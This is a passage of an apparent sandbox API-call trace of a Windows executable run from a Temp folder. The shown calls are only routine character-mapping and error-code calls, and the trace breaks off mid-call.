\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0093.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x49\xcb\xff\x08\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.258] GetLastError () returned 0x6 [0093.258] SetLastError (dwErrCode=0x6) [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ") returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0093.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x49\xcb\xff\x08\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.258] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.258] GetLastError () returned 0x0 [0093.258] SetLastError (dwErrCode=0x0) [0093.258] GetLastError () returned 0x0 [0093.258] SetLastError (dwErrCode=0x0) [0093.258] GetLastError () returned 0x0 [0093.258] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError 
(dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError 
(dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError 
(dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError 
(dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError 
(dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError 
(dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError 